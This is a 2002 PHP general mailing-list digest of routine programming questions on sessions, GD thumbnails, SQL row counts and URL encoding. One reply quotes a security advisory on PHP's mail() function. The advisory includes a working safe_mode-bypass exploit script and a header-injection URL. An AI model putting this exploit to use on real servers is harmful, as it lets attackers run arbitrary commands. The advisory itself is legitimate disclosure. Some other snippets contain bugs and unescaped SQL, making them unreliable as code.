php-general Digest 25 Aug 2002 15:45:34 -0000 Issue 1546
Topics (messages 114024 through 114058):
Dynamically Downloading Data
114024 by: Randy Johnson
114052 by: salamander
Re: Base64 and MS Word cutting and pasting.
114025 by: Manuel Lemos
Re: Recent discovered mail security bug in php
114026 by: Manuel Lemos
114027 by: Randy Johnson
114030 by: Manuel Lemos
Re: moving content from one database to another, help
114028 by: Richard Lynch
Session woes
114029 by: Matthew Nock
Open a new window by code
114031 by: Alva Chew
114032 by: Dan Harrington
114034 by: Justin French
Re: Message Post with File Attachment
114033 by: Justin French
Re: Pulling data out of browser address bar
114035 by: Paul Roberts
Apache module failure
114036 by: Casey Allen Shobe
Additional: [PHP] Apache module failure
114037 by: Casey Allen Shobe
need to find a way to remove similar keys
114038 by: electroteque
114039 by: electroteque
114041 by: electroteque
GD lib. image quality!
114040 by: Arcadius A.
114055 by: electroteque
Re: Count number of rows in table.
114042 by: Tony Harrison
114047 by: Matt
114048 by: Bas Jobsen
114050 by: salamander
114053 by: Jason Wong
problem with using link variables
114043 by: Ivan Carey
114044 by: Bas Jobsen
114045 by: Arcadius A.
known bugs in current CHM, contribution appreciated!
114046 by: Gabor Hojtsy
Re: uploading problems...please help
114049 by: Jason Wong
Re: register globals on in stand alone php installation?
114051 by: Jason Wong
trouble with function
114054 by: Justin French
114056 by: Matt
114058 by: Michael Sims
Re: Attachements
114057 by: Oliver Witt
Administrivia:
To subscribe to the digest, e-mail:
[EMAIL PROTECTED]
To unsubscribe from the digest, e-mail:
[EMAIL PROTECTED]
To post to the list, e-mail:
[EMAIL PROTECTED]
----------------------------------------------------------------------
--- Begin Message ---
Hello,
Is it possible to select data from a database and have it be available for
download without actually creating a file on the server?
Randy
--- End Message ---
--- Begin Message ---
Randy,
Try using a View, or a Temp Table in your database.
This keeps the data "available" in a specified form.
Best regards,
Andrew Hill
OpenLink Software
On Sunday, August 25, 2002, at 12:23 AM, Randy Johnson wrote:
> Hello,
>
> Is it possible to select data from a database and have it be available
> for
> download without actually creating a file on the server?
>
> Randy
>
>
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
--- End Message ---
--- Begin Message ---
Hello,
On 08/24/2002 07:17 PM, Dennis Moore wrote:
> I have an application which uses the <textarea> tag for users to input data. This
>works fine. However, some users are using MS Word to generate the text and then
>cutting and pasting into the <textarea>. This works fine as well.
>
> However, I am encountering a problem when the application mails the submitted
>content. Everything is viewed fine throught the web. We are MIME encoding the
>message using base64 functions. The problem is that not all email clients are
>decoding the MS Word pasted content properly. Quotes and apostrophes are not being
>decoded properly.
>
> I assume the problem is that the MS Word pasted content is not ASCII. I need to
>convert this content to ASCII before we encode the MIME message.
>
> Do you have any ideas?
You should not be using base64 but rather quoted-printable with the
right character encoding headers.
If you do not know how to do it, take a look at this class and examples
to see how to specify the encoding:
http://www.phpclasses.org/mimemessage
--
Regards,
Manuel Lemos
--- End Message ---
--- Begin Message ---
Hello.
On 08/24/2002 04:32 PM, Robert Mena wrote:
> Hi,
>
> After reading the security announcement I'd like to
> know two things :
What security announcement?
>
> a) If i use another MTA (such as qmail) am I still
> vulnerable ?
>
> b) What's the impact of the second vulnerability
> (called open relay) ?
This sounds like an e-mail setup problem, not something to do with PHP.
--
Regards,
Manuel Lemos
--- End Message ---
--- Begin Message ---
He may be referring to this:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Product: PHP
Version: 4.x up to 4.2.2
Vendor: http://www.php.net/
Author: Wojciech Purczynski <[EMAIL PROTECTED]>
Date: June 13, 2002
Updated: August 23, 2002
Released: August 21, 2002
Issue:
======
Two vulnerabilities exists in mail() PHP function. The first one allows to
execute any program/script bypassing safe_mode restriction, the second one
may give an open-relay script if mail() function is not carefully used in
PHP scripts.
Description:
============
PHP is a widely-used general-purpose scripting language that is especially
suited for Web development and can be embedded into HTML.
Details:
========
(1) Bypassing safe_mode restriction
If PHP is configured with safe_mode option enabled, special restriction
are set up including limit on external binaries that may be executed
from within a PHP script.
The 5th argument to the mail() function (introduced in version 4.0.5)
allow specifying command line option to the sendmail binary. Some time
ago a bug was found in the mail() function allowing to pass shell
meta-characters in the 5th argument, leading to execute arbitrary shell
commands or external binaries. This bug was fixed in version 4.1.0.
However, mail() function is still vulnerable because it allows to pass
command line arguments to the sendmail binary which gives the ability to
influence its behavior (i.e. by using non-default aliases, custom
configuration files - other cases are possible with others MTAs)
Passing 5th argument should be disabled if PHP is configured in safe_mode.
Exploit attached at the end.
(2) Injecting ASCII control characters into mail() arguments
Arbitrary ASCII control characters may be injected into string arguments
of mail() function. If mail() arguments are takeon from user's input it
may give the user ability to alter message content including mail
headers.
Example of such a vulnerability may be found on PHP.net site:
(URL wrapped for readability)
http://www.php.net/mailing-lists.php?
[EMAIL PROTECTED]%0a&[EMAIL PROTECTED]%0a
PHP should do content filtering before creating message body sent
with "sendmail -t" command.
Impact:
=======
(1) Any user may bypass safe_mode restrictions if mail() function is not
disabled.
(2) Open-relay PHP script if user's data is poorly or not filtered and
passed to the mail() function.
Exploit:
========
Sample exploit for (1) that works with sendmail MTA:
- -----8<----- bypass_safe_mode.php -----8<-----
<?
$script=tempnam("/tmp", "script");
$cf=tempnam("/tmp", "cf");
$fd = fopen($cf, "w");
fwrite($fd, "OQ/tmp
Sparse=0
R$*" . chr(9) . "$#local $@ $1 $: $1
Mlocal, P=/bin/sh, A=sh $script");
fclose($fd);
$fd = fopen($script, "w");
fwrite($fd, "rm -f $script $cf; ");
fwrite($fd, $cmd);
fclose($fd);
mail("nobody", "", "", "", "-C$cf");
?>
- -----8<----- bypass_safe_mode.php -----8<-----
Fix:
====
(1) has been successfully fixed in the latest CVS snapshot. Fix for the
(2) is not sufficient and it is still possible to inject ASCII control
characters that causes argument string to be truncated. Please refer to
the example URL mentioned above.
These bugs haven't been fixed yet in the latest 4.2.2 stable release.
- --
Wojciech Purczynski
iSEC Security Research
http://isec.pl/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQE9ZeSsC+8U3Z5wpu4RAsqBAKC04X7sCrcOQOXjpXgPqDXQjUEufgCfcokE
5n+9UMdQVqw1HYdh2opFsjY=
=iKiW
-----END PGP SIGNATURE-----
----- Original Message -----
From: "Manuel Lemos" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Sunday, August 25, 2002 12:55 AM
Subject: [PHP] Re: Recent discovered mail security bug in php
> Hello.
>
> On 08/24/2002 04:32 PM, Robert Mena wrote:
> > Hi,
> >
> > After reading the security announcement I'd like to
> > know two things :
>
> What security announcement?
>
>
> >
> > a) If i use another MTA (such as qmail) am I still
> > vulnerable ?
> >
> > b) What's the impact of the second vulnerability
> > (called open relay) ?
>
> This sounds like an e-mail setup problem, not something to do with PHP.
>
>
> --
>
> Regards,
> Manuel Lemos
>
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
--- End Message ---
--- Begin Message ---
Hello,
On 08/25/2002 01:56 AM, Randy Johnson wrote:
> He may be referring to this:
Ah, ok. These are not real security bugs if you control your own server
and use escape your scripts data properly. It is a good idea that they
are prevented in PHP though.
--
Regards,
Manuel Lemos
--- End Message ---
--- Begin Message ---
>I'm sorry, I thought that what I was asking was very simple. but everyone
>wants to make it more
>difficult then it actually is.
No, you just hadn't quite explained what you needed properly.
There were simply too many undefined points in your email for a reasonable
answer to be given.
If you really want to ignore the experts and do it your way, here's a crude
sample script that should be pretty close to what you think you want:
<?php
# Untested code written on the fly:
$stage = mysql_connect('stage.example.com', 'stageuser', 'stagepass') or
die('Could not connect to stage database');
mysql_select_db('stage', $stage) or die('Could not select stage
database');
$production = mysql_connect('production.example.com', 'productionuser',
'productionpass') or die('Could not connect to production database');
mysql_select_db('production', $production) or die('Could not select
production database');
# Update production data to "archived" status:
$query = "update sometable set archived = 1";
mysql_query($query, $production) or die("Could not update production
database to 'archived'");
# Find out which IDs already exist in 'production'
$query = "select whatever_id from sometable";
$archived = mysql_query($query, $production) or die("Could not obtain
production IDs");
$archived_ids = array();
while (list($id) = mysql_fetch_row($archived)){
$archived_ids[] = $id;
}
# Snag any staged content that is not yet archived (ie, on production):
$archived_ids_sql = implode(', ', $archived_ids;
$query = "select whatever_id, whatever_columns from sometable where
whatever_id in ($archived_ids_sql)";
$newbies = mysql_query($query, $stage) or die("Could not obtain stage
data");
# Copy all those rows to 'production'
while (list($whatever_id, $whatever_columns) = mysql_fetch_row($newbies)){
$query = "insert into whatever(whatever_id, whatever_columns) ";
$query = "values($whatever_id, '$whatever_columns') ";
mysql_query($query, $production) or die("Could not insert $whatever_id
into production");
}
?>
NOTES:
You could put this on 'stage' or 'production' server and run it from a cron
job, or on demand from some other script, or just by loading it into a
browser.
You'll need to configure MySQL on the machine where this script is *not*
living to accept connections from the "other" machine. In other words,
assuming you put this on 'stage', and you expect the script to be able to
mysql_connect('production.example.com' ..., you will need to configure MySQL
on 'production.example.com' to accept connections from 'stage.example.com'
I think MySQL out of the box will only accept connections from 'localhost'
(ie, the same machine as it's on)
You could gain a little (or maybe a lot...) of performance by using MySQL's
multiple-insert syntax instead of doing a different insert query for every
single new row in 'stage'. However, multiple-insert syntax will not be
portable to most other SQL engines, I don't think.
You can either repeat the above technique for as many tables as you need,
*OR* if you have a zillion tables, you could use
http://php.net/mysql-list-tables to get all the tables in the database
(either one) and then http://php.net/mysql-list-fields to figure out what
tables/fields are in each database and build your queries dynamically.
WARNING:
This is probably not the right way to do what you want to do. I'm only
answering your question, no matter how wrong that question might be :-) The
experts have already told you that, and you don't seem to want to listen,
though, so I figure you might as well try it your way and see what happens.
You might some day find it easier to re-think your design, however, and
time-stamp the records that can be "archived" and then always just use
mysqldump to move stage -> production.
You would then add an extra table/field to your schema that tracked when the
previous 'move' occurred, and any records 'older' than that would be
'archived' records, not 'current'
Using mysqldump and a time-stamp will "scale up" *MUCH* better if the number
of records/tables/fields increases dramatically...
The above script is very, very crude and will *NOT* do well when zillions of
records are added to stage at once.
If you don't expect the numbers to ever become large, just do whichever one
makes you happy :-)
But if you are thinking this database might grow large, doing it the way
above is insane.
YMMV
--
Like Music? http://l-i-e.com/artists.htm
--- End Message ---
--- Begin Message ---
Hi All,
I have a bit of a problem using the session management functions in PHP4.
(PHP 4.1.2 in fact)
I have a "order wizard" system on my website that is using PHP sessions to
track values entered on the various forms across all pages of the wizard.
at the start of each page i am issuing the "session_start();" command.
Session ID's are passed in the GET string as part of the URL, and form
values are posted..
each page submits the user data back onto itself (I have all my validation
etc at the top of the document) - thus if the user fails to enter certain
values, the page doesnt move into the next step, but instead alert them to
their errors.
if the form values pass, the form will move on to the next page using a
header(location: nextpage.php) command.
the problem I have, however, is that on the third page of my wizard, if the
user submits only some of the required fields, it submits back onto itself
and displays an error as required, but the problem is that when you fill in
the missing fields and move on to the next page (in effect back onto itself
first, then on to the next page) the fields that had their values missing,
are not passed along...
Does this all make sense? I can provide all the code samples if need be.
I have tested this scenario using a PC running apache under Win2K, and also
on a Unix box with Apache - same problem.
Thanks for any help.
M@
--- End Message ---
--- Begin Message ---
Hi,
Does anyone know how can i open a new browser window by PHP code?
Thanks and regards.
Alva Chew
--- End Message ---
--- Begin Message ---
You can't with PHP exclusively as far as I know.
But you can do this:
<?
print("
<script language=\"JavaScript\">
<!--
window.open(foobar);
//-->
</script>");
and it will open a new window.
> -----Original Message-----
> From: Alva Chew [mailto:[EMAIL PROTECTED]]
> Sent: Sunday, August 25, 2002 12:39 AM
> To: [EMAIL PROTECTED]
> Subject: [PHP] Open a new window by code
>
>
> Hi,
>
> Does anyone know how can i open a new browser window by PHP code?
>
> Thanks and regards.
> Alva Chew
>
>
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
--- End Message ---
--- Begin Message ---
*sigh*
This gets asked EVERY DAY on the list.
1. search the archives before posting
2. PHP is server-side, so there's no way it can interact with the
client-side... try javascript
Justin French
on 25/08/02 4:38 PM, Alva Chew ([EMAIL PROTECTED]) wrote:
> Hi,
>
> Does anyone know how can i open a new browser window by PHP code?
>
> Thanks and regards.
> Alva Chew
>
>
--- End Message ---
--- Begin Message ---
Search the manual for "File Uploads"... there's an excellent code example,
plus user-cont notes, etc etc.
In other words, read the manual before asking :)
Justin French
on 25/08/02 5:27 AM, JohnP ([EMAIL PROTECTED]) wrote:
>
> Ok gang here is the problem - I need to allow the user to post a message with
> a title and allow them to upload a file as well - the message and title need
> to post to the db which is pretty cut and dry but since I have never worked
> with uploading before I do not know how to allow the user to upload files -
> can anyone help? Right now I have a form setup with all three fields but I'm
> not sure where to go from here? Thanks -
> JohnP
>
>
--- End Message ---
--- Begin Message ---
try $REQUEST_URI
The URI which was given in order to access this page; for instance, '/index.html'.
Paul Roberts
http://www.paul-roberts.com
[EMAIL PROTECTED]
++++++++++++++++++++++++
----- Original Message -----
From: <[EMAIL PROTECTED]>
To: "php-general" <[EMAIL PROTECTED]>
Sent: Friday, August 23, 2002 10:54 PM
Subject: Re[4]: [PHP] Pulling data out of browser address bar
> This is close to what I want but I don't what to redirect them I just
> want to get what is in the URL so I can but it in a variable to use on
> the web page. I have a lot of domain names all pointing to one domain
> and I want to be able to put "WELCOME TO TheDomannamethaytypedin.com" at the top of
> the page depending on what domain they typed into the URL. They will
> not be coming from another page they will most likely be typing the
> URL in
>
> Friday, August 23, 2002, 2:22:21 PM, you wrote:
>
>
> SJNHBe> This probably isn't doing what you want but it will illustrate how to get
> SJNHBe> the location.
>
> SJNHBe> <script language="javascript">
> SJNHBe> <!--
> SJNHBe> function checklocation(goodurl) {
> SJNHBe> if (self.window.location != goodurl) {
> SJNHBe> self.window.location = goodurl;
> SJNHBe> }
>
> SJNHBe> }
> -->>
> SJNHBe> </script>
>
> SJNHBe> Bascially you call checklocation with the url they should be at, if they
> SJNHBe> aren't at that url it will redirect them to their URL.
>
> SJNHBe> I use this script by placing and onLoad event in the <body> tag, an example
> SJNHBe> is <body style="font-family: Arial" bgcolor="FFFFFF"
> SJNHBe> onLoad="checklocation('http://www.yoursite.com/login.php')">
>
>
> SJNHBe> I created this script because some people were only going to yoursite.com
> SJNHBe> instead of www.yoursite.com, this caused sessions not to work because the
> SJNHBe> browser was not sending the cookies with the request because the cookies
> SJNHBe> were for www.yoursite.com.
>
> SJNHBe> Jason
> SJNHBe> -----Original Message-----
> SJNHBe> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
> SJNHBe> Sent: Friday, August 23, 2002 3:24 PM
> SJNHBe> To: php-general
> SJNHBe> Subject: Re[2]: [PHP] Pulling data out of browser address bar
>
> SJNHBe> Hello Kevin,
> SJNHBe> I don't what to know where that came from I what to know what is in
> SJNHBe> the Address bar of the browser. They might not be coming from anywhere
> SJNHBe> they might have just typed the url in. I will look at doing it with
> SJNHBe> Javascript
>
> SJNHBe> Friday, August 23, 2002, 1:21:10 PM, you wrote:
>
>
> KS>> You can do it with Javascript but there's no need. $HTTP_REFERER is
> SJNHBe> what
> KS>> you want. It'll tell you where your users are coming from. So you'll
> SJNHBe> know
> KS>> if they have been redirected from one your other domains.
> KS>> -Kevin
>
> KS>> ----- Original Message -----
> KS>> From: <[EMAIL PROTECTED]>
> KS>> To: "php-general" <[EMAIL PROTECTED]>
> KS>> Sent: Friday, August 23, 2002 2:19 PM
> KS>> Subject: [PHP] Pulling data out of browser address bar
>
>
> >>> Is there any way to tell what was typed in the browser to get to the
> >>> web page.
> >>> What I have is domain names that forward to a main domain and I
> >>> want to know what they typed in the browser to get to the main domain.
> >>> The way it is forwarded the browser retains what ever was typed
> >>> in the address bar. How can I pull what was typed into the address bar
> >>> this info into the web page.
> >>>
> >>>
> >>>
> >>> --
> >>> Best regards,
> >>> rdkurth mailto:[EMAIL PROTECTED]
> >>>
> >>>
> >>> --
> >>> PHP General Mailing List (http://www.php.net/)
> >>> To unsubscribe, visit: http://www.php.net/unsub.php
> >>>
>
>
>
>
>
>
>
>
> --
> Best regards,
> rdkurth mailto:[EMAIL PROTECTED]
>
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
>
--- End Message ---
--- Begin Message ---
root@epona:/etc# apachectl start
Syntax error on line 14 of /etc/httpd.conf:
Cannot load /usr/lib/libphp4.so into server: /usr/lib/libphp4.so: undefined
symbol: alloc_globals
/usr/sbin/apachectl start: httpd could not be started
root@epona:/etc# head -n 14 /etc/httpd.conf | tail -n 1
LoadModule php4_module lib/libphp4.so
Installation process used:
./configure --prefix=/usr --sysconfdir=/etc --without-mysql
--with-pgsql --enable-memory-limit --with-zlib --with-bz2
--with-openssl --with-config-file-path=/etc --enable-track-vars
--enable-bcmath --enable-calendar --with-gdbm --with-gmp
--with-apxs=/usr/sbin/apxs &&
make &&
make install
PHP version: 4.2.2
Apache version: 1.3.26 compiled as follows:
./configure --prefix=/usr --sysconfdir=/etc --mandir=/usr/share/man
--localstatedir=/var --libexecdir=/usr/lib --datadir=/var/www/default
--with-layout=GNU --enable-module=so --enable-module=speling
--enable-module=unique_id --enable-module=usertrack
--enable-module=vhost_alias
--enable-module=log_agent --enable-module=info &&
make &&
make install
root@epona:/etc# ldd /usr/lib/libphp4.so
libdl.so.2 => /lib/libdl.so.2 (0x4016a000)
libpq.so.2 => /usr/lib/libpq.so.2 (0x4016e000)
libgmp.so.3 => /usr/lib/libgmp.so.3 (0x40182000)
libgdbm.so.2 => /usr/lib/libgdbm.so.2 (0x401bb000)
libbz2.so.1.0 => /lib/libbz2.so.1.0 (0x401c1000)
libz.so.1 => /usr/lib/libz.so.1 (0x401d1000)
libcrypt.so.1 => /lib/libcrypt.so.1 (0x401e2000)
libssl.so.0.9.6 => /usr/lib/libssl.so.0.9.6 (0x4020f000)
libcrypto.so.0.9.6 => /usr/lib/libcrypto.so.0.9.6 (0x40240000)
libresolv.so.2 => /lib/libresolv.so.2 (0x4030f000)
libm.so.6 => /lib/libm.so.6 (0x40322000)
libnsl.so.1 => /lib/libnsl.so.1 (0x40345000)
libc.so.6 => /lib/libc.so.6 (0x4035b000)
/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x80000000)
I would much rather be using Apache 2.0.40, however PHP would not build at all
with --with-apxs2=/usr/sbin/apxs on another machine with Apache 2.0.40
installed.
In any case, I really need to get something working. Any advice is
appreciated.
--
Casey Allen Shobe / Network Security Analyst & PHP Developer
SecureWorks, Inc. / 404.327.6339 x169 / Fax: 404.728.0144
[EMAIL PROTECTED] / http://www.secureworks.net
Content is my own and does not necessarily represent my company.
--- End Message ---
--- Begin Message ---
On Sunday 25 August 2002 06:10 am, Casey Allen Shobe wrote:
> I would much rather be using Apache 2.0.40, however PHP would not build at
> all with --with-apxs2=/usr/sbin/apxs on another machine with Apache 2.0.40
> installed.
I was stupid in saying that without mentioning any further detail...here
follows what I should have mentioned previously:
package php:/usr/src/php/php-4.2.2> ./configure --prefix=/usr
--sysconfdir=/etc --without-mysql --with-pgsql --enable-memory-limit
--with-zlib --with-bz2 --with-openssl --with-config-file-path=/etc
--enable-track-vars --enable-bcmath --enable-calendar --with-gdbm --with-gmp
--with-apxs2=/usr/sbin/apxs
[...configure completes successfully...]
package php:/usr/src/php/php-4.2.2> make
[...snip...]
Making all in apache2filter
make[2]: Entering directory `/usr/src/php/php-4.2.2/sapi/apache2filter'
make[3]: Entering directory `/usr/src/php/php-4.2.2/sapi/apache2filter'
/bin/sh /usr/src/php/php-4.2.2/libtool --silent --mode=compile gcc -I.
-I/usr/src/php/php-4.2.2/sapi/apache2filter -I/usr/src/php/php-4.2.2/main
-I/usr/src/php/php-4.2.2 -I/usr/include/apache2 -I/usr/src/php/php-4.2.2/Zend
-I/usr/src/php/php-4.2.2/ext/xml/expat -D_REENTRANT
-I/usr/src/php/php-4.2.2/TSRM -O3 -march=i686 -mcpu=i686 -funroll-loops
-ffast-math -pthread -DZTS -prefer-pic -c sapi_apache2.c
sapi_apache2.c: In function `php_register_hook':
sapi_apache2.c:534: warning: passing arg 3 of `ap_register_output_filter'
makes pointer from integer without a cast
sapi_apache2.c:534: too few arguments to function `ap_register_output_filter'
sapi_apache2.c:535: warning: passing arg 3 of `ap_register_input_filter' makes
pointer from integer without a cast
sapi_apache2.c:535: too few arguments to function `ap_register_input_filter'
make[3]: *** [sapi_apache2.lo] Error 1
make[3]: Leaving directory `/usr/src/php/php-4.2.2/sapi/apache2filter'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/usr/src/php/php-4.2.2/sapi/apache2filter'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/usr/src/php/php-4.2.2/sapi'
make: *** [all-recursive] Error 1
package php:/usr/src/php/php-4.2.2>
Again, thanks in advance for any advice.
--
Casey Allen Shobe / Network Security Analyst & PHP Developer
SecureWorks, Inc. / 404.327.6339 x169 / Fax: 404.728.0144
[EMAIL PROTECTED] / http://www.secureworks.net
Content is my own and does not necessarily represent my company.
--- End Message ---
--- Begin Message ---
hi i am trying to find a possible way to remove similar id keys and pass
back just each different one , for example i have a photo gallery each photo
has a userID key of who the photo was taken by i would like to grab all the
id for each photo and pass back just one result of the different people who
have taken the photos
so i append them all like 1, 1, 1, 1, 2, 1, 2, 1, 3 and i just want to get
back 1, 2, 3 keys?
--- End Message ---
--- Begin Message ---
sorry i found array_unique , so then how could i append the keys out of
mysql bak into one array ?
"Electroteque" <[EMAIL PROTECTED]> wrote in message
[EMAIL PROTECTED]">news:[EMAIL PROTECTED]...
> hi i am trying to find a possible way to remove similar id keys and pass
> back just each different one , for example i have a photo gallery each
photo
> has a userID key of who the photo was taken by i would like to grab all
the
> id for each photo and pass back just one result of the different people
who
> have taken the photos
>
> so i append them all like 1, 1, 1, 1, 2, 1, 2, 1, 3 and i just want to get
> back 1, 2, 3 keys?
>
>
--- End Message ---
--- Begin Message ---
never mind
SELECT DISTINCT u.user_name, u.email, p.userID FROM user u LEFT JOIN photos
p on p.userID=u.user_id WHERE p.galleryID='$galleryID'
heh
"Electroteque" <[EMAIL PROTECTED]> wrote in message
[EMAIL PROTECTED]">news:[EMAIL PROTECTED]...
> hi i am trying to find a possible way to remove similar id keys and pass
> back just each different one , for example i have a photo gallery each
photo
> has a userID key of who the photo was taken by i would like to grab all
the
> id for each photo and pass back just one result of the different people
who
> have taken the photos
>
> so i append them all like 1, 1, 1, 1, 2, 1, 2, 1, 3 and i just want to get
> back 1, 2, 3 keys?
>
>
--- End Message ---
--- Begin Message ---
Hello!
I wrote a little script for generation thumbnails of larger images....
<code>
$origImage = imageCreateFromJpeg($sourcePath."/".$currentImageName);
$thumbnail = imageCreate($thumbWidth,$thumbHeight);// create empty image
imageCopyResized($thumbnail,$origImage,0,0,0,0,$thumbWidth,$thumbHeight,imag
esX($origImage),imagesY($origImage));
imageJpeg($thumbnail, $targetPath."/".$thumbNamePrefix."_thumb.jpg"); //
Store it
imageDestroy($thumbnail); // cleanup
echo "<br>Image ".$targetPath."/".$thumbNamePrefix."_thumb.jpg"."
created successfully!";
</code>
then, I've noticed that the quality of the thumbnails created is very bad!
my "phpinfo()" page shows "2.0 or higher" as GD version
So, I'm wondering whether I'm doing something wrong in my code or whether
there exist a better library to use with PHP ... a library able to generate
good quality JPG files...
Thanks in advance.
Arcadius.
--- End Message ---
--- Begin Message ---
its not a gd 2 issue , i cant even get gd2 to compile with php 4.2.2, no
idea why i've installed gd2 fine
imageJpeg($thumbnail, $targetPath."/".$thumbNamePrefix."_thumb.jpg",100);
that'll give it a quality of 100 , even still i notice its pretty bad , i
need to use the bicubicresampled gd2 function just need it compiled
correctly , how did you get gd2 to work ?
"Arcadius A." <[EMAIL PROTECTED]> wrote in message
[EMAIL PROTECTED]">news:[EMAIL PROTECTED]...
> Hello!
> I wrote a little script for generation thumbnails of larger images....
> <code>
> $origImage = imageCreateFromJpeg($sourcePath."/".$currentImageName);
> $thumbnail = imageCreate($thumbWidth,$thumbHeight);// create empty
image
>
>
imageCopyResized($thumbnail,$origImage,0,0,0,0,$thumbWidth,$thumbHeight,imag
> esX($origImage),imagesY($origImage));
> imageJpeg($thumbnail, $targetPath."/".$thumbNamePrefix."_thumb.jpg");
//
> Store it
> imageDestroy($thumbnail); // cleanup
> echo "<br>Image ".$targetPath."/".$thumbNamePrefix."_thumb.jpg"."
> created successfully!";
>
> </code>
>
> then, I've noticed that the quality of the thumbnails created is very bad!
> my "phpinfo()" page shows "2.0 or higher" as GD version
>
> So, I'm wondering whether I'm doing something wrong in my code or whether
> there exist a better library to use with PHP ... a library able to
generate
> good quality JPG files...
>
> Thanks in advance.
>
> Arcadius.
>
>
>
--- End Message ---
--- Begin Message ---
And do I need to use any other functions like mysql_fetch_row() ?
"Martín marqués" <[EMAIL PROTECTED]> wrote in message
news:[EMAIL PROTECTED]...
> On Sáb 24 Ago 2002 11:19, Tony Harrison wrote:
> > How would I count the number of rows in a mysql table with a WHERE
clause?
>
> select count(*) from table_name WHERE .....
>
> Saludos... :-)
>
> --
> Porqué usar una base de datos relacional cualquiera,
> si podés usar PostgreSQL?
> -----------------------------------------------------------------
> Martín Marqués | [EMAIL PROTECTED]
> Programador, Administrador, DBA | Centro de Telematica
> Universidad Nacional
> del Litoral
> -----------------------------------------------------------------
--- End Message ---
--- Begin Message ---
>>> On Sáb 24 Ago 2002 11:19, Tony Harrison wrote:
>>> How would I count the number of rows in a mysql table with a WHERE
>>> clause?
> >
>> "Martín marqués" <[EMAIL PROTECTED]> wrote in message
> > news:[EMAIL PROTECTED]...
> > select count(*) from table_name WHERE .....
> >
>From: "Tony Harrison" <[EMAIL PROTECTED]>
> Sent: Saturday, August 24, 2002 5:54 PM
> Subject: Re: [PHP] Count number of rows in table.
>
> And do I need to use any other functions like mysql_fetch_row() ?
>
Yes. It's a regular sql statement, so you must fetch the results.
$sql = "select count(*) from table_name WHERE .....";
$result = mysql_query($sql) or die(mysql_error);
$row = mysql_fetch_row($result);
$rowCount=$row[0];
--- End Message ---
--- Begin Message ---
> $sql = "select count(*) from table_name WHERE .....";
> $result = mysql_query($sql) or die(mysql_error);
> $row = mysql_fetch_row($result);
> $rowCount=$row[0];
or
$sql = "select count(*) from table_name WHERE .....";
$result = mysql_query($sql) or die(mysql_error);
$rowCount=mysql_result($result);
--- End Message ---
--- Begin Message ---
or, you should be able to simply do this, without the cost of fetching
the results:
$result = mysql_query("SELECT count(*) FROM table WHERE");
$num_rows = mysql_num_rows($result);
echo "$num_rows Rows\n";
>> $sql = "select count(*) from table_name WHERE .....";
>> $result = mysql_query($sql) or die(mysql_error);
>> $row = mysql_fetch_row($result);
>> $rowCount=$row[0];
> or
> $sql = "select count(*) from table_name WHERE .....";
> $result = mysql_query($sql) or die(mysql_error);
> $rowCount=mysql_result($result);
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
--- End Message ---
--- Begin Message ---
On Sunday 25 August 2002 22:07, salamander wrote:
> or, you should be able to simply do this, without the cost of fetching
> the results:
>
> $result = mysql_query("SELECT count(*) FROM table WHERE");
> $num_rows = mysql_num_rows($result);
> echo "$num_rows Rows\n";
No. This only returns 1 row regardless. "SELECT COUNT(*) FROM ..." only
returns a single row with a single column containing the row count. Using
mysql_num_rows() on that will always return 1.
--
Jason Wong -> Gremlins Associates -> www.gremlins.com.hk
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
/*
I'm going to Vietnam at the request of the White House. President Johnson
says a war isn't really a war without my jokes.
-- Bob Hope
*/
--- End Message ---
--- Begin Message ---
Hello,
I am sending variables via a link to another page eg. <a
href=\"agencydet.php?provnum=$provservid\">$provservdesc</a>
If the variable provnum contains text such as: hello & there
Then only the word hello is passed on to agencydet.php.
I have tried using htmlspecialchars and htmlentities but still I have the same problem.
What I am trying to achieve is to be able to display hello & there on the
agencydet.php page when it is shown in the browser.
Thanks,
Ivan
--- End Message ---
--- Begin Message ---
> If the variable provnum contains text such as: hello & there
urlencode($provnum);
--- End Message ---
--- Begin Message ---
See the URL functions at http://www.php.net/manual/en/ref.url.php
IMHO, you'd need some encoding....
Arcadius
"Ivan Carey" <[EMAIL PROTECTED]> wrote in message
006b01c24c2f$8d291950$0201a8c0@ivan">news:006b01c24c2f$8d291950$0201a8c0@ivan...
Hello,
I am sending variables via a link to another page eg. <a
href=\"agencydet.php?provnum=$provservid\">$provservdesc</a>
If the variable provnum contains text such as: hello & there
Then only the word hello is passed on to agencydet.php.
I have tried using htmlspecialchars and htmlentities but still I have the
same problem.
What I am trying to achieve is to be able to display hello & there on the
agencydet.php page when it is shown in the browser.
Thanks,
Ivan
--- End Message ---
--- Begin Message ---
Hi!
I would like to ask you guys again, who have problems with the
current CHM edition to help us make all them go away. We already
corrected the example display problem, but some guys reported
bugs about the context menu positioning and the page display
process also has some bugs in IE6.
The bug descriptions and contribution requests are available at
http://weblabor.hu/php-doc-chm/#knownbugs Please contribute to
this great project if you have some JS experience and the
appropriate software to test. I am not going to upgrade to IE6
myself, that is for sure, sorry.
As far as I can see, the context menu positioning is OK
logically, but some reports keep posted to the CHM list.
The page display problems are simply bugs in IE, and we
need to find a workaround.
For those who tested iframetests.zip I have released a new
version so please test again!
Thanks for your help and contribution to the PHP community,
Goba
--- End Message ---
--- Begin Message ---
On Sunday 25 August 2002 05:53, Brian & Shannon Windsor wrote:
> I'm trying to upload files from my PC to my website. The code is a little
> nuts, but it's all I got to work locally, butonce I take the code to the
> web I get this message. Can anyone tell me what I'm doing wrong?
>
> I'm trying to upload a file, strip all the information so as to just use
> the name of the file to store in the database. I'm using explode and
